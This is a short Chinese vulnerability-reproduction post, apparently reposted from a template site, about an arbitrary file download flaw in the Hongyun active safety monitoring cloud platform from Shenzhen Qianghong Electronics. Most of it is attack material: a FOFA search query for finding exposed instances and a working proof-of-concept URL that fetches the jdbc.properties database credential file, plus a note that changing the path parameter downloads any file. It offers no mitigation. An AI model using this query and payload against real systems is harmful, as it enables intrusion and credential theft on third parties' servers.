简介
深圳市强鸿电子有限公司鸿运主动安全监控云平台网页存在任意文件下载漏洞,攻击者可通过此漏洞下载网站配置文件等获得登录账号密码
漏洞复现
FOFA语法:body="./open/webApi.html"
获取网站数据库配置文件
POC:/808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
访问 http://ip:port//808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties
可直接下载到该文件
替换path=后的文件可导致任意文件下载:文章来源:https://www.toymoban.com/news/detail-743363.html
文章来源地址https://www.toymoban.com/news/detail-743363.html
到了这里,关于鸿运主动安全云平台任意文件下载漏洞复习的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!